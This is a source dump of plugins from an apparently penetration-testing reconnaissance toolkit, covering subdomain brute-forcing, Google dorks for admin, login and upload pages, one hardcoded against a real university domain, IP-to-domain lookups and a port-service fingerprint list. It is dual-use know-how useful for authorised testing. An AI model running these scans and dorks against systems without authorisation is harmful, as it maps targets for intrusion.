8 | from urlparse import urlparse
9 | else:
10 | from urllib.parse import urlparse
11 |
12 | key = 'site:hbu.edu.cn 后台'# sys.argv[1]
13 |
14 | urls = []
15 |
16 | for each_result in search(key, stop=4):
17 | parseRet = urlparse(each_result)
18 | print(each_result, parseRet)
19 | url = parseRet.scheme + '://' + parseRet.netloc
20 | if 'hbu.edu.cn' in parseRet.netloc and url not in urls: # compare against the site domain, not the full query string
21 | print(url, each_result)
22 | urls.append(url)
23 |
24 | print('search {} Done!'.format(key))
25 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/.gitignore:
--------------------------------------------------------------------------------
1 | _build/
2 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line.
5 | SPHINXOPTS =
6 | SPHINXBUILD = sphinx-build
7 | SPHINXPROJ = googlesearch
8 | SOURCEDIR = .
9 | BUILDDIR = _build
10 |
11 | # Put it first so that "make" without argument is like "make help".
12 | help:
13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
14 |
15 | .PHONY: help Makefile
16 |
17 | # Catch-all target: route all unknown targets to Sphinx using the new
18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
19 | %: Makefile
20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/index.rst:
--------------------------------------------------------------------------------
1 | .. googlesearch documentation master file, created by
2 | sphinx-quickstart on Tue Nov 6 12:25:12 2018.
3 | You can adapt this file completely to your liking, but it should at least
4 | contain the root `toctree` directive.
5 |
6 | Welcome to googlesearch's documentation!
7 | ========================================
8 |
9 | Indices and tables
10 | ==================
11 |
12 | * :ref:`genindex`
13 | * :ref:`modindex`
14 | * :ref:`search`
15 |
16 | Reference
17 | =========
18 |
19 | .. automodule:: googlesearch
20 | :members:
21 |
22 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/docs/make.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | pushd %~dp0
4 |
5 | REM Command file for Sphinx documentation
6 |
7 | if "%SPHINXBUILD%" == "" (
8 | set SPHINXBUILD=sphinx-build
9 | )
10 | set SOURCEDIR=.
11 | set BUILDDIR=_build
12 | set SPHINXPROJ=googlesearch
13 |
14 | if "%1" == "" goto help
15 |
16 | %SPHINXBUILD% >NUL 2>NUL
17 | if errorlevel 9009 (
18 | echo.
19 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
20 | echo.installed, then set the SPHINXBUILD environment variable to point
21 | echo.to the full path of the 'sphinx-build' executable. Alternatively you
22 | echo.may add the Sphinx directory to PATH.
23 | echo.
24 | echo.If you don't have Sphinx installed, grab it from
25 | echo.http://sphinx-doc.org/
26 | exit /b 1
27 | )
28 |
29 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
30 | goto end
31 |
32 | :help
33 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
34 |
35 | :end
36 | popd
37 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/google.py:
--------------------------------------------------------------------------------
1 | from Spider.Google.googlesearch import search
2 | from sys import version_info
3 |
4 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
5 |
6 | if PY2:
7 | from urlparse import urlparse
8 | else:
9 | from urllib.parse import urlparse
10 |
11 | # Google spider
12 | class GoogleSpider:
13 | def __init__(self, domain, save_fold_path):
14 | self.domain = domain
15 | # site:domain inurl:admin inurl:login inurl:system 后台 系统
16 | self.wds = ['inurl:admin|login|register|upload|editor', '后台|系统']
17 | # print('Please wait a few time ...')
18 | self.STOP = 50 # stop after at most this many Google results
19 | self.save_fold_path = save_fold_path # \result\0ca9b508e31f
20 | self.googleSubdomains = []
21 |
22 | def run(self):
23 | for wd in self.wds:
24 | with open('{}/googleSpider.txt'.format(self.save_fold_path), 'at') as f:
25 | key = 'site:*.{} {}'.format(self.domain, wd)
26 | f.writelines('[+] {} :\n'.format(key))
27 | print('\t[+] google search -> [{}]'.format(key))
28 | for each_result in search(key, stop=self.STOP): # pass the limit so self.STOP is actually honored
29 | f.writelines('{}\n'.format(each_result))
30 | parseRet = urlparse(each_result)
31 | subdomain = parseRet.netloc
32 | if self.domain in subdomain and subdomain not in self.googleSubdomains:
33 | self.googleSubdomains.append(subdomain)
34 |
35 | return self.googleSubdomains
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/googlesearch/user_agents.txt.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Google/googlesearch/user_agents.txt.gz
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Sublist3r/setup.py:
--------------------------------------------------------------------------------
1 | from setuptools import setup, find_packages
2 |
3 | setup(
4 | name='Sublist3r',
5 | version='1.0',
6 | python_requires='>=2.7',
7 | install_requires=['dnspython', 'requests', 'argparse; python_version==\'2.7\''],
8 | packages=find_packages()+['.'],
9 | include_package_data=True,
10 | url='https://github.com/aboul3la/Sublist3r',
11 | license='GPL-2.0',
12 | description='Subdomains enumeration tool for penetration testers',
13 | classifiers=[
14 | 'Development Status :: 5 - Production/Stable',
15 | 'Environment :: Console',
16 | 'Intended Audience :: Information Technology',
17 | 'Intended Audience :: System Administrators',
18 | 'Intended Audience :: Telecommunications Industry',
19 | 'License :: OSI Approved :: GNU General Public License v2',
20 | 'Operating System :: POSIX :: Linux',
21 | 'Programming Language :: Python',
22 | 'Programming Language :: Python :: 2',
23 | 'Programming Language :: Python :: 3',
24 | 'Programming Language :: Python :: 2.7',
25 | 'Programming Language :: Python :: 3.4',
26 | 'Programming Language :: Python :: 3.5',
27 | 'Programming Language :: Python :: 3.6',
28 | 'Topic :: Security',
29 | ],
30 | keywords='subdomain dns detection',
31 | entry_points={
32 | 'console_scripts': [
33 | 'sublist3r = sublist3r:interactive',
34 | ],
35 | },
36 | )
37 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Sublist3r/subbrute/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Sublist3r/subbrute/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/beian2NewDomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/beian2NewDomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/githubSubdomains/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/githubSubdomains/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/hostCollide/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/hostCollide/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ip2domain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ip2domain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ip2domain/getIp2Domain.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # disable insecure request warnings
5 |
6 | from queue import Queue
7 | from threading import Thread
8 | from IPy import IP
9 | import re
10 |
11 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
12 | TIMEOUT = 10
13 | cmp = re.compile(r'{"domain":"http:\\/\\/(.*?)","title":".*?"}') # regex extraction rule (unused; the JSON response is parsed directly)
14 |
15 | def ip2domain(allTargets_Queue, domain, _domain, ip2domain_dict, num, newDomains):
16 | while not allTargets_Queue.empty():
17 | ip = allTargets_Queue.get()
18 | url = r'http://api.webscan.cc/?action=query&ip={}'.format(ip)
19 | print(url)
20 | try:
21 | res = requests.get(url=url, headers=headers, timeout=TIMEOUT, verify=False)
22 | text = res.text
23 | if text != 'null':
24 | results = json.loads(text) # parse the JSON response instead of eval()ing untrusted text
25 | domains = []
26 | for each in results:
27 | domains.append(each['domain'])
28 | # domains = cmp.findall(text)
29 | if domains:
30 | ip2domain_dict[ip] = domains
31 | print('[{}] {}'.format(ip, domains))
32 | if domain:
33 | for each in domains:
34 | if _domain in each and domain not in each and len(each) > 1:
35 | newDomains.append(each)
36 | except Exception as e:
37 | print('[error] ip2domain: {}'.format(e.args))
38 |
39 |
40 |
41 | def run_ip2domain(domain, allTargets_Queue):
42 | ip2domain_dict = {} # dict: key is the IP, value is the list of domains hosted on it
43 | newDomains = []
44 | if domain:
45 | _domain = domain.split('.')[0] # e.g. 'baidu' for 'baidu.com'
46 | else:
47 | _domain = None
48 |
49 | threads = []
50 | for num in range(50):
51 | t = Thread(target=ip2domain, args=(allTargets_Queue, domain, _domain, ip2domain_dict, num, newDomains))
52 | threads.append(t)
53 | t.start()
54 | for t in threads:
55 | t.join()
56 |
57 | return ip2domain_dict, list(set(newDomains))
58 |
59 |
60 | if __name__ == '__main__':
61 | domain = ''
62 | allTargets_Queue = Queue(-1)
63 | allTargets_Queue.put('')
64 | allTargets_Queue.put('')
65 | ip2domain_dict, _newDomains = run_ip2domain(domain, allTargets_Queue)
66 | # for ip in ip2domain_dict:
67 | # print('[{}] -> {}'.format(ip, ip2domain_dict[ip]))
68 |
69 | print(ip2domain_dict)
70 | subdomains = []
71 | for subdomain in ip2domain_dict.values():
72 | subdomains.extend(subdomain)
73 |
74 | setSubdomains = list(set(subdomains))
75 | print('[{}] {}'.format(len(setSubdomains), setSubdomains))
76 | print(_newDomains)
77 |
78 | #
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ipAddress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ipAddress/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ipAddress/getIpAddress.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
3 | # Disable insecure request warnings
4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
5 |
6 | from queue import Queue
7 | from threading import Thread
8 | import json
9 | import re
10 |
11 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
12 | TIMEOUT = 10
13 |
14 | def get_ip_address(ip_Queue, ip_address_dict, num):
15 | while not ip_Queue.empty():
16 | ip = ip_Queue.get()
17 | url = r'http://whois.pconline.com.cn/ipJson.jsp?ip={}&json=true'.format(ip)
18 | try:
19 | res = requests.get(url=url, headers=headers, timeout=TIMEOUT, verify=False)
20 | text = res.text
21 | json_text = json.loads(text)
22 | address = json_text['addr']
23 | ip_address_dict[ip] = address
24 | print('[{}] {}'.format(ip, address))
25 | except Exception as e:
26 | print('[error] get_ip_address: {}'.format(e.args))
27 |
28 |
29 |
30 | def run_getIpAddress(ip_list):
31 | ip_Queue = Queue(-1)
32 | ip_address_dict = {} # dict: key is the IP, value is its geographic location
33 |
34 | # put the IPs into the queue
35 | for ip in ip_list:
36 | ip_Queue.put(ip)
37 |
38 | threads = []
39 | for num in range(50):
40 | t = Thread(target=get_ip_address, args=(ip_Queue, ip_address_dict, num))
41 | threads.append(t)
42 | t.start()
43 | for t in threads:
44 | t.join()
45 |
46 | return ip_address_dict
47 | # print(web_Titles)
48 |
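49 | # Illustrative usage sketch (the addresses are placeholders):
50 | # ip_address_dict = run_getIpAddress(['114.114.114.114', '8.8.8.8'])
51 | # print(ip_address_dict)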
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ksubdomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/ksubdomain.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 |
4 | def run_ksubdomain(domain):
5 | ksubdomains = []
6 | ksubdomain_folder = './Plugins/infoGather/subdomain/ksubdomain'
7 | ksubdomain_file = '{}/{}.txt'.format(ksubdomain_folder, domain)
8 |
9 | os.system('chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux')
10 | os.system('./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux -d {} -o {}'.format(domain, ksubdomain_file))
11 | try:
12 | with open(ksubdomain_file, 'rt') as f:
13 | for each_line in f.readlines():
14 | each_line_split = each_line.split('=>')
15 | subdomain = each_line_split[0].strip() # the subdomain part
16 | ksubdomains.append(subdomain)
17 |
18 | os.remove(ksubdomain_file) # remove the temporary output file
19 | except Exception as e:
20 | ksubdomains = []
21 |
22 | return list(set(ksubdomains))
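23 |
24 | # Illustrative usage sketch (assumes the bundled ksubdomain_linux binary can run on this host; example.com is a placeholder):
25 | # print(run_ksubdomain('example.com'))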
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/.gitignore:
--------------------------------------------------------------------------------
1 | *.py[cod]
2 | .idea/*
3 | tmp/
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/1.txt:
--------------------------------------------------------------------------------
1 | baidu.com
2 | taobao.com
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/README.md:
--------------------------------------------------------------------------------
1 | subDomainsBrute 1.1
2 | ======
3 |
4 | A fast sub domain brute tool for pentesters.
5 |
6 | This tool gathers domains of a penetration-testing target. High-concurrency DNS brute forcing finds domains that other sources such as Google, aizhan and fofa cannot discover.
7 |
8 | You can get older versions via [https://github.com/lijiejie/subDomainsBrute/releases](https://github.com/lijiejie/subDomainsBrute/releases)
9 |
10 |
11 | ## Change Log
12 | * [2018-02-06]
13 | * Added multi-process support. Multi-process + coroutines improve scan efficiency.
14 | * Pre-processed the placeholders in the original dictionary to improve scan efficiency
15 | * [2017-06-03] Bug fix: removed a deep-copy issue in normal_lines, thanks @BlueIce
16 | * [2017-05-04] Replaced multi-threading with coroutines; used a priority queue to shorten the queue; improved placeholder support
17 |
18 |
19 | ## Dependencies ##
20 | > pip install dnspython gevent
21 |
22 |
23 | ## Usage ##
24 | Usage: subDomainsBrute.py [options] target.com
25 | Options:
26 | --version show program's version number and exit
27 | -h, --help show this help message and exit
28 | -f FILE File contains new line delimited subs, default is
29 | subnames.txt.
30 | --full Full scan, NAMES FILE subnames_full.txt will be used
31 | to brute
32 | -i, --ignore-intranet
33 | Ignore domains pointed to private IPs
34 | -t THREADS, --threads=THREADS
35 | Num of scan threads, 200 by default
36 | -p PROCESS, --process=PROCESS
37 | Num of scan Process, 6 by default
38 | -o OUTPUT, --output=OUTPUT
39 | Output file name. default is {target}.txt
40 |
41 |
42 | ## Screenshot ##
43 |
44 | As shown, scanning qq.com with the default dictionary found 2319 unique domains in about 298 seconds.
45 |
46 | 
47 |
48 | Output could be like: [https://github.com/lijiejie/subDomainsBrute/blob/master/dict/sample_qq.com.txt](https://github.com/lijiejie/subDomainsBrute/blob/master/dict/sample_qq.com.txt)
49 |
50 | From [http://www.lijiejie.com](http://www.lijiejie.com)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/lijiejie/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/lijiejie/lib/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/cmdline.py:
--------------------------------------------------------------------------------
1 | import optparse
2 | import sys
3 |
4 |
5 | def parse_args():
6 | parser = optparse.OptionParser('usage: %prog [options] target.com',
7 | version="%prog 1.1")
8 | parser.add_option('-f', dest='file', default='subnames.txt',
9 | help='File contains new line delimited subs, default is subnames.txt.')
10 | parser.add_option('--full', dest='full_scan', default=False, action='store_true',
11 | help='Full scan, NAMES FILE subnames_full.txt will be used to brute')
12 | parser.add_option('-i', '--ignore-intranet', dest='i', default=False, action='store_true',
13 | help='Ignore domains pointed to private IPs')
14 | parser.add_option('-t', '--threads', dest='threads', default=200, type=int,
15 | help='Num of scan threads, 200 by default')
16 | parser.add_option('-p', '--process', dest='process', default=6, type=int,
17 | help='Num of scan Process, 6 by default')
18 | parser.add_option('-o', '--output', dest='output', default=None,
19 | type='string', help='Output file name. default is {target}.txt')
20 |
21 | (options, args) = parser.parse_args()
22 | if len(args) < 1:
23 | parser.print_help()
24 | sys.exit(0)
25 | return options, args
26 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/consle_width.py:
--------------------------------------------------------------------------------
1 | """ getTerminalSize()
2 | - get width and height of console
3 | - works on linux,os x,windows,cygwin(windows)
4 | """
5 |
6 | __all__ = ['getTerminalSize']
7 |
8 |
9 | def getTerminalSize():
10 | import platform
11 | current_os = platform.system()
12 | tuple_xy = None
13 | if current_os == 'Windows':
14 | tuple_xy = _getTerminalSize_windows()
15 | if tuple_xy is None:
16 | tuple_xy = _getTerminalSize_tput()
17 | # needed for window's python in cygwin's xterm!
18 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
19 | tuple_xy = _getTerminalSize_linux()
20 | if tuple_xy is None:
21 | tuple_xy = (80, 25) # default value
22 | return tuple_xy
23 |
24 |
25 | def _getTerminalSize_windows():
26 | res = None
27 | try:
28 | from ctypes import windll, create_string_buffer
29 |
30 | # stdin handle is -10
31 | # stdout handle is -11
32 | # stderr handle is -12
33 |
34 | h = windll.kernel32.GetStdHandle(-12)
35 | csbi = create_string_buffer(22)
36 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
37 | except:
38 | return None
39 | if res:
40 | import struct
41 | (bufx, bufy, curx, cury, wattr,
42 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
43 | sizex = right - left + 1
44 | sizey = bottom - top + 1
45 | return sizex, sizey
46 | else:
47 | return None
48 |
49 |
50 | def _getTerminalSize_tput():
51 | # get terminal width
52 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
53 | try:
54 | import subprocess
55 | proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
56 | output = proc.communicate(input=None)
57 | cols = int(output[0])
58 | proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
59 | output = proc.communicate(input=None)
60 | rows = int(output[0])
61 | return (cols, rows)
62 | except:
63 | return None
64 |
65 |
66 | def _getTerminalSize_linux():
67 | import os # needed below for os.open/os.ctermid/os.environ
68 | def ioctl_GWINSZ(fd):
69 | try:
70 | import fcntl, termios, struct
71 | return struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
72 | except:
73 | return None
74 |
75 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
76 | if not cr:
77 | try:
78 | fd = os.open(os.ctermid(), os.O_RDONLY)
79 | cr = ioctl_GWINSZ(fd)
80 | os.close(fd)
81 | except:
82 | pass
83 | if not cr:
84 | try:
85 | env = os.environ
86 | cr = (env['LINES'], env['COLUMNS'])
87 | except:
88 | return None
89 | return int(cr[1]), int(cr[0])
90 |
91 |
92 | if __name__ == "__main__":
93 | sizex, sizey = getTerminalSize()
94 | print('width =', sizex, 'height =', sizey)
95 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/othersApiSubdomains/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/othersApiSubdomains/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/queryA/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/queryA/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/queryA/queryA.py:
--------------------------------------------------------------------------------
1 | # Query the A records of subdomains
2 | import re
3 | from queue import Queue
4 | from threading import Thread
5 | import dns.resolver
6 |
7 | def query_A(t_id, subtract_subdomains_queue, Subdomains_ips): # resolve the A-record IPs
8 | while not subtract_subdomains_queue.empty():
9 | subdomain = subtract_subdomains_queue.get()
10 | # print('{}, '.format(subdomain), end='')
11 | try:
12 | dns_A_ips = [j for i in dns.resolver.query(subdomain, 'A').response.answer for j in i.items]
13 | ips = []
14 | for each_ip in dns_A_ips:
15 | each_ip = str(each_ip)
16 | if re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$').match(each_ip): # regex check that the value is an IPv4 address
17 | ips.append(str(each_ip))
18 | Subdomains_ips[subdomain] = ips
19 | except Exception as e:
20 | Subdomains_ips[subdomain] = []
21 |
22 | def run_queryA(Subdomains_ips, subdomains):
23 | query_A_threads = [] # 存放线程
24 | subtract_subdomains_queue = Queue(-1)
25 |
26 | for subdomain in subdomains:
27 | subtract_subdomains_queue.put(subdomain)
28 |
29 | # print('query A : ', end='')
30 |
31 |
32 | for t_id in range(50): # query A records for the subdomains to resolve their IPs
33 | t = Thread(target=query_A, args=(t_id, subtract_subdomains_queue, Subdomains_ips))
34 | query_A_threads.append(t)
35 | t.start()
36 | for t in query_A_threads:
37 | t.join()
38 |
39 | # print()
40 | return Subdomains_ips
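41 |
42 | # Illustrative usage sketch (www.example.com is a placeholder):
43 | # print(run_queryA({}, ['www.example.com']))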
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/scanPort/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/demo.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | url = r'http://127.0.0.1:9080/'
4 | res = requests.get(url=url, timeout=10, verify=False)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/server_info.ini:
--------------------------------------------------------------------------------
1 | ftp|21|^220.*\n331|^220.*\n530|^220.*FTP|^220 .* Microsoft .* FTP
2 | ssh|22|^ssh-
3 | ldap|389|
4 | smb|445|
5 | rsync|873|^@RSYNCD|^@ERROR
6 | mssql|1433|
7 | oracle|1521|
8 | mysql|3306|^.\0\0\0.*?mysql|^.\0\0\0\n|.*?MariaDB server|mysql
9 | rdp|3389|
10 | svn|3690|
11 | PostgreSql|5432|
12 | vnc|5800|^RFB
13 | vnc|5900|^RFB
14 | redis|6379|-ERR|^\$\d+\r\nredis_version
15 | Elasticsearch|9200|
16 | Elasticsearch|9300|
17 | memcached|11211|
18 | mongodb|27017|
19 | mongodb|27018|
20 | weblogic|7001|
21 | Zookeeper|2181|
22 | Zookeeper|2171|
23 | Memcache|11211|
24 | Hadoop|50070|
25 | couchdb|9584|
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/Bruteapi.py:
--------------------------------------------------------------------------------
1 | #encoding=utf8
2 | from brutedns import Brutedomain
3 |
4 |
5 | class cmd_args:
6 | def __init__(self):
7 | self.domain=''
8 | self.speed=''
9 | self.level=''
10 | self.cdn = ''
11 | self.sub_dict=''
12 | self.next_sub_dict =''
13 | self.default_dns = ''
14 | self.other_result=''
15 |
16 | class Brute_subdomain_api:
17 | def run(self,domain, speed, level,default_dns,cdn,sub_dict,next_sub_dict,other_file):
18 | cmd_args.domain = domain
19 | cmd_args.speed = speed
20 | cmd_args.level = level
21 | cmd_args.sub_file = sub_dict
22 | cmd_args.default_dns= default_dns
23 | cmd_args.next_sub_file = next_sub_dict
24 | cmd_args.other_file = other_file
25 | cmd_args.cname='y'
26 | brute = Brutedomain(cmd_args)
27 | brute.run()
28 | return brute.found_count
29 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomain3/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/config/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomain3/config/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/config/config.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 |
3 | # If an invalid IP shows up repeatedly during brute forcing, add it to the list below and it will be filtered out.
4 | waiting_fliter_ip = [
5 | '1.1.1.1',
6 | '127.0.0.1',
7 | '0.0.0.0',
8 | '0.0.0.1'
9 | ]
10 |
11 | # Three speed modes; tune them with the settings below
12 |
13 | # high
14 | high_segment_num = 800 # The dictionary is loaded into memory in chunks to reduce memory usage; this sets how much is read per chunk
15 |
16 | # medium
17 | medium_segment_num = 550
18 |
19 | # low
20 | low_segment_num = 350
21 |
22 | # Maximum number of times an IP may appear; later occurrences are discarded
23 | ip_max_count = 30
24 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomainInterface/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomainInterface/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/template/multiThreading.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf-8 -*-
2 | # Multi-threading framework template
3 |
4 | from Wappalyzer import Wappalyzer, WebPage
5 | from threading import Thread
6 | import sys
7 | # (Queue is imported below according to the Python version)
8 | from traceback import print_exc
9 | import warnings
10 |
11 | warnings.filterwarnings('ignore')
12 | import re
13 | from sys import version_info
14 | import requests
15 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
16 |
17 | # Disable insecure request warnings
18 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
19 |
20 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
21 | if PY2:
22 | from Queue import Queue
23 | from urlparse import urlparse
24 | else:
25 | from queue import Queue
26 | from urllib.parse import urlparse
27 |
28 |
29 | # Multi-threaded web detection template
30 | class webDetect:
31 | def __init__(self, Hosts, save_fold_path, fileName):
32 | self.Hosts = Hosts # domains or IPs
33 | self.save_fold_path = save_fold_path
34 | self.fileName = fileName
35 |
36 | self.headers = {
37 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
38 | self.TIMEOUT = 10
39 | self.threadsNum = 100
40 | self.queueTasks = Queue(-1) # task queue holding the domains/IPs
41 | self.port = [21, 22, 23, 25, 53, 80, 110, 139, 143, 389, 443, 445, 465, 873, 993, 995, 1080, 1723, 1433, 1521,
42 | 3306, 3389, 3690, 5432, 5800, 5900, 6379, 7001, 81, 88, 89, 888, 880, 8000, 8001, 8080, 8081, 8888,
43 | 9200, 9300, 9080, 9999, 11211, 27017]
44 | self.allServerInfo = self.read_config('./scanPort/server_info.ini') # read the port-service regex signatures
45 | self.TIMEOUT = 10 # socket timeout
46 | self.port_info = {}
47 | self.headers = {
